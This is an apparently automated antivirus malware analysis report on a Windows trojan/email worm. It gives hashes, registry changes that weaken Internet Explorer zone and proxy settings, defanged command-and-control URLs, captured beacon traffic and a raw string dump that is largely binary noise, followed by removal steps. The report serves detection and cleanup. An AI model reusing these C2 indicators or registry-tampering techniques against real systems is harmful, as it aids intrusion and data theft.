Trojan.Win32.FlyStudio_b14c438e54
HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:208
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)
Registry activity
The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
147127382e001f495d1842ee7a9e7912 | c:\WINDOWS\system32\SkinH_EL.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1076750 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1081344 | 603664 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 1687552 | 401322 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2088960 | 383528 | 368640 | 1.56795 | 352a9695457ee0ad5ff21f6565a784ad |
.vmp0 | 2473984 | 2517355 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp0 | 4993024 | 49204 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5046272 | 3488220 | 3489792 | 5.49416 | bd74e24f97f5e8629357ae467e146b06 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326 | ![]() |
hxxp://221.123.147.73/piaoyh.aspx | ![]() |
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 221.123.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/
Cache-control: private2....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 12
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=97E121E98E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 3200280096003A009600E1002800EE003A....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 33954E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E1
24E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E
50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68
E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69
E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E....
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
@.vmp0
`.vmp0
`.vmp1
g.EM^V7Z
EweB
e%f'G
.OO??b
cS.NO
.fF~p
EV.OrE
X%fqwE
$ÿ'
òDC
.nO? 4
M.Osc
}m.Bb~??
.GFfz
k.bsSw
Wn.QRA
.EEh(
b:\yL
\m.RB
]DU.Nmn
Vm.BCP3t5%f.RQQAe%F'G>.NbC_d%f'Kk>..QQmT.pO`xMM.oOt$(SSh~%UVWu$SShekernel32.dllshlwapi.dlluser32.dllntdll.dllole32.dllWinINet.dllWininet.dllCreateWindowStationACloseWindowStationExitWindowsExHttpOpenRequestAHttpSendRequestAHttpQueryInfoAGetAsyncKeyStateGetTcpTableCreatePipeMSXML2.XMLHTTPMicrosoft.XMLHTTPMSXML2.ServerXMLHTTPMSXML2.ServerXMLHTTP.6.0WinHttp.WinHttpRequest.5.1Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)application/x-www-form-urlencodedFreestyle.execonfig.ini1000000001http://221.123.147.73/zhuzhou.txtdrivers\etc\hosts.asp&SQL=HTTP/1.1Content-Type: application/x-www-form-urlencodedhttp://1.ini2.ini3.ini4.ini.Aqwertyuiopasdfghjklzxcvbnmc:\11.bmpC$%cmb.ppM|aZ.mO%-^.hk;~KERNEL32.DLLCOMCTL32.dllGDI32.dllMSIMG32.dllMSVCRT.dllMSVFW32.dllUSER32.dllSkinH_EL.dll%System%\SkinH_EL.dll%u y20.du./.K.cW}.DknOkC.xL%System%\esdpf.she1990317927@kernel32.dll90*('$$-1-TOUCH PASSF%*.*fCNotSupportedExceptioncommctrl_DragListMsgAfx:%x:%x:%x:%x:%xAfx:%x:%xCOMCTL32.DLLCCmdTarget__MSVCRT_HEAP_SELECTSHLWAPI.dllMPR.dllVERSION.dllWSOCK32.dll.PAVCException@@.PAVCNotSupportedException@@.PAVCFileException@@(*.prn)|*.prn|(*.*)|*.*||Shell32.dllMpr.dllAdvapi32.dllUser32.dllGdi32.dllKernel32.dll(&07-034/)7 '?? / %d]%d / %d]: %d](*.WAV;*.MID)|*.WAV;*.MID|WAV(*.WAV)|*.WAV|MIDI(*.MID)|*.MID|(*.txt)|*.txt|(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG(*.JPG)|*.JPG|BMP(*.BMP)|*.BMP|GIF(*.GIF)|*.GIF|(*.ICO)|*.ICO|(*.CUR)|*.CUR|%s:%dwindowsout.prn%d.%d%d / %d%d/%dBogus message code %d(%d-%d):%ld%chttp://dywt.com.cnservice@dywt.com.cn86(0411)8899583486(0411)88995831Windows(ESPINN.dll(NNThis is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/infoCallerInfoCopyCmdSetIPPortGetIPPort"C:\Windows\System32\ESPI11.dll"ProviderInstallCopyCmdSockDataCopyCmdSockAddrCopyCmdenetintercept_fnSockAddrSetIPPortenetintercept_fnSockAddrGetIPPortenetintercept_fnInstallCopyCmdenetintercept_fnSockDataCopyCmdenetintercept_fnSockAddrCopyCmdenetintercept_fnCallerInfoCopyCmd%s\ESPI%d.dllHTTP/1.0%s <%s>Reply-To: %sFrom: %sTo: %sSubject: %sDate: %sCc: %s%a, %d %b %Y %H:%M:%SSMTPwww.dywt.com.cnX-X-X-X-X-X%ld 0000%dEMSGRecv Sub Packet(%s)..Recv Packet (%s)...1.1.3;3 #>6.&'2, / 0&7!4-)1#%d%d%drundll32.exe shell32.dll,.PAVCObject@@.PAVCSimpleException@@.PAVCMemoryException@@.?AVCNotSupportedException@@.PAVCResourceException@@.PAVCUserException@@.?AVCCmdTarget@@.?AVCCmdUI@@.?AVCTestCmdUI@@.PAVCArchiveException@@zcÁc:\%original file name%.exe(&''&(,*%).--.)%$#include "l.chs\afxres.rc" // Standard components>6n.Rr:,WEBhD$%%f&GVm.BB|f.ozn.nn/5vBN.rR,5%FWq],.yx.fJ&7.GhX3H,.sS-DEYZ}H >.Nb!V; 5-%%FjZl%fGJ.fWvVg_, 792:"$EE%f:#Sz%un.Rr:$l%uJ8%fz[&7Ww%f%f:El3.Rr: EP.RB%eU=-.Bb.OscF6Vj^j,LM.OPJ*.nB.OscF&.N.op.RJK;hI%ulyf.ozt!:%suÿ6wKn.BQ6.Or:-Aa}=6.EEh:$X-0}|%0xpu*b.ar3CD%%F)>.Oc#-mx}W:\Jn.Nr:%.oz(~N:%xIQ:%ss|\:%u;{m:%f4X:%dW%Xym:%Xv!:%S:%CX7.RJBCC$ecS.gH%FjZ54z%f::5\-.RQPw%Fj::6:|s.vrt5%fzDU.nEn.RQQA.PXjk-z[SQL F%fwe%.FfVw5M.RB%>eE%f'~V.Nrb.RR:8|p.FFZE.Os4:&D$ B!.Wh,=>("{[->~|/f.yx~;.Rr:>-.RSwôt:>ymEÿN.Rs:>.pweo.ol0cev.NLLl-M.Nr3:?z:?e%fw..op0.Osc>V6.NqEN%fwED$$%ubX*%um.NOs%.RcDhe.fF!n.RB%~ .WE}]-GD<45ò-i1l}llzCJ%U-=N.RB.fGk O:2*N.RBv.OEO<3.um.^,0<83:2[]M.By^?:3E.WhH.LCT-%Fj:3(m.nNn.Rr:0mK.CQeD$$1%x4%Fj :0R.inzE5%fz;W8b"Cc$%f&n)|.CUe\.YvRc#D%%F.N.nOrM.nnw%F:6..Pa!EDD4KV.Xim..nOp~n*%uNg.EEYYm.RB%>:.Ne%Fj:6.FfV12m.Nrb}m.Bv_,6<92:4$.Oc9#c$%FZn.BQn.RS:2ÿ##G7E5.ws&J:.ff~.NbBV=N.Rk?cS6.nOscD$ (%9UcDd%f.OP0TD$<7%s4x%fYj.Nq2FMmn.vaV7.gVg:d%FG'.QRvf.KPay*%u-,D.EgiouU.feN.RB6n.} m.Osn.yasw/@-.Rr:"cd%F&.Nrjk[K$..BV.Ok &Jn.RB.Nj*N\^*.afH E%8x@i,\m.RB*=$H%FjZ5D$,%c;2.VgffD$<1%x4V.-e}5L|.yh 1q"3t|.yPV.Vhml-.RB.oOs4.Jkiz?.hizS%F'ggD$$%s.nh7FöWk.Ey%FN.LePa.Nrb=VwO)Jm.RB.ajBS%XltIl.mAdx#!,;2%Dkr.AXO>]lyOd%FH7f2u!63%f5J@Ü#d.NHF&.Vx}jJ%8xWINMM.dllWS2_32.dllGetWindowsDirectoryAWINSPOOL.DRVUnregisterHotKeyRegEnumKeyAShellExecuteA)~.cQd3%6x]Qo@%xÈ~qJ.Rv}#&/%x0pJ.rhd*.VP=LF.LFCreateDialogIndirectParamASetViewportOrgEx@.vl]^6a.yUZ?X.bry.qL@.^H.ntPrN`-21$%DH.GK`,/' .,5?9@'wgio.kj(.KI*\'.nU'6$^0(4635-in}I_^.goKRQU.Xb.-(263?@% -46?>@7bn.pu\v\.ade !%F%uLqs~X%gm.ku8L.Xh_e?=E.OV[%c{HFJOQ.UVWeBnfk-hmpx}hudp~"$!-(1<$p.toHO.NRjh.ry.KYHqWAw]%XX]'"/8-.*,?WZ.Xa%X$)13%F"@:$-164138Y].cf`l.mw]`eik.ome(#&.OJ#(0352>:MKS.VQ".ODADKR[f.noGAC.IM1;GCE.NIhHKOEXe~72K.dH@68=;V<.GK(NV]^ZzY.hL.AqVmPOo>.hJ.pl/)T;D.jy!oi4.YSWl.MYH"=N.CHC=T%Xz3E.tO{IPZfoO.aN.jueIO0.Ya.Nk/}2.NrO1.ZT[QA.tB.my.(J[.TOKR.kQ.WWQeJ.DHtS%UGNV/(X.bl.XEU^%x9}oH%sia.miQ,%d`;L'iCNq.xCgB:\8o@.gr=6ZWININET.dllRegDeleteKeyAADVAPI32.dllInternetCrackUrlAOLEAUT32.dllSetWindowsHookExARegisterHotKeyGetViewportExtExRegOpenKeyA6u!'$%fRASAPI32.dll.CxeYiThe procedure entry point %c could not be located in the dynamic link library %sThe ordinal %u could not be located in the dynamic link library %sGetProcessHeapInternetCanonicalizeUrlAOffsetViewportOrgExWinExec@0@@@8@ @=.lh4.S%XQ([HDI.UQ# ,) 126X".COxD.COXW.hp@^`.mk9.AE`DHQWWG.alq/'%SzW%/.(5170>;:@/,e.oh/u/I.OO%.ORs.mdxpY%u(pb615?GM.PYJp$.OLDb%sMn"!@'#,193S.OG.KT`_fcd:v=D.OJa.zx(%Dx*R\.xR@.ns)zx7ce.nw0%FIPF.;.ibi.OzHo=1n'.KR%xRWU]8?>7D.IWv16.JXHVZ.XY*-0,(53?]"*/4368.GJfib.mT4M.YH4Y`en.oi7.!)`5<8:.gl#(bKeY01?F@I.OT(.HSO$&! 517{@'(3251?&Ê1(*f.EK0!,. 3(2;8'"Î@Ief.kn)q{5t-.WD.DC_)@q$!-.43<).XHm_u_bnw.rz.)689?;>' .(6740Bk.wv.pyP}9 Y`.mt[%/-08=?!o.XJA|,[y%.Pas` ðA%Fj>jT^\_[X.dnF3.ePf$! '#,0:!*/)6.5<MU]fa.glZY.KJXZ(.TLH:.woz`UWP]aio.npV8.EC& #(1159.6?<.GI8KLJQR#/0)4265.GDe(d~B.Fg`.joxpsqrQ.upeK-Xd},,4>8EAL.MV.HqK5'".ME" !-)72?.ovxnr~gV`.jpp5T24V=.DCJMn/.ON*.,/521=j(/)0=.FD@HMITUq5"j%FP! -1427<t%Do}4;.EMV.b.OUBDL.VSIXc| "/, 536=>:$".745>6?9CK.WZmlknj.vwYgb.nw.jWZ4%fjb1.LS[Z _bed1!#*5:3<%xC1i<.rut_y}].bnfK.SWT^.dm.tYy}709@.CO\^Bo?$!#,(*07>v}.xz/-4xy}it.QK]#%FHgf`ko.jw\elji.vyQSWUZfl.it)61732;<n.VQ \fnlio)}%c{Hu.dGLXTl36>:FI.WPPRUvy.CNAg0.sr(Zb.ls8yzsT.ZfgcU%S2'`.y%x.ks@}{zssh!:FEKV.ST) -.03:;0%xQATp).GB{UPRFi.mk# ,$.OHMO.JN7%xFMnc%Xx[X%upD2801547.DJ',!( .zO_t5\Q.Wc%x")46e"%FJ!O%sn#'%D-,0%$0&.)/({'#%Dn#&,835>;@XX%5Xi0b%.OU3JLRU.Ze".IS$v`%up'V\.YgB&%XPZacVo.puJrj>E.IV& %/ 14=(".cN$ ' %, 6'.IOPu" %(0?@.JI,.(653;>JSX]f.geXadko.qz[dD,R%c.GN /6.OS9^.af@glvrpRYec.dj@DM.KQq\[! @6;9=8%uvw~', -758:.) 2621`^@z(.yx[_bad.ljDIM.WUh_x~\Xbn.qsJt3Q=A.DO.[g`.dc1o#"(41 5:89<;=D.EB.nx9;8RVZed.giYr~-. %8,-/.*HJLK.RW@S\flm9# y.YDW.dJ;%#'&-7?.9;*.aXFCJLU.PQi.(.IK,`.Ka!0 -) .(TXgcli.ohPupz]`ackop.wy8.ZP.xe~y%xE)_ "-/751;%u4DH.jqt'@.EOUSEAF.LTcrp.uyGJ.INTZc.di(W.jR_'cE&a.hl9qu!9=AI.SZ]& /.zO(.DQ(A*% .GJlP}|]%x`il.kv-c.kd|FK.cqN1%f!$-.)0;=:/, 709=;.RY{zc\a.eiSv&$eQ]f.gc3O.kGi".GA* /7<98`.HJhVd.muhqy(598;?8'eo.rt.emhoknrlO%cJ/$312;@%sKCP%s/u?~)em.qubzOf.yM@boNLM.VY8akmlqRPSYd.ei8s{}$d$.OI@'.RSo!./53<>_3=?D.BIjF.IcR@.rl'! )/.21QX[d.lj(pr:@FHVQSQLDBEIS^c.bj3o?;A.BKec.ljVnD3.SO^-*.OV/6e%xIR_.Ycsv.wq,-14>?=5T\ef.jho$)70;.BJ_.abPmrqpp_yurlx{|G.fa.XK(vas7%U=VP^.YaXgn`cjo.kh<",)/*7|6Yp%U{B.AGLQ^ab.nh# ")7065-71500.R .ghIor='sk.tp8wyo.IGMgF<h.Nf O.Bx$! )0.*179&,7?D.ABDBusSqlSVZgckj.hvh@.HPW& #"(58:`$#/:*,25%Xi&_l%fPNk?=:GOQT.ZX_%x!6ýS?SXcakr.wqYX\.ag$.OWd!'#$/. )63?9;.jF,1$,.15<@)3M.SR#_\'%-.59;[!.SNRegOpenKeyExAcomdlg32.dlliphlpapi.dllSetViewportExtExGetViewportOrgExKERNEL32.dll.ILWj}SHELL32.dllScaleViewportExtExUnhookWindowsHookExGetCPInfoGetKeyState-N}MDRegCreateKeyExA.IHC6aRegCloseKey1, 0, 6, 6(*.*)%original file name%.exe_208_rwx_009BC000_00002000:
WININET.dllRegDeleteKeyAADVAPI32.dllInternetCrackUrlAOLEAUT32.dllSetWindowsHookExARegisterHotKeyGetViewportExtExRegOpenKeyA6u!'$%fRASAPI32.dll%original file name%.exe_208_rwx_009BF000_00001000:
The procedure entry point %c could not be located in the dynamic link library %sUSER32.dllThe ordinal %u could not be located in the dynamic link library %sGetProcessHeapInternetCanonicalizeUrlAOffsetViewportOrgEx
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.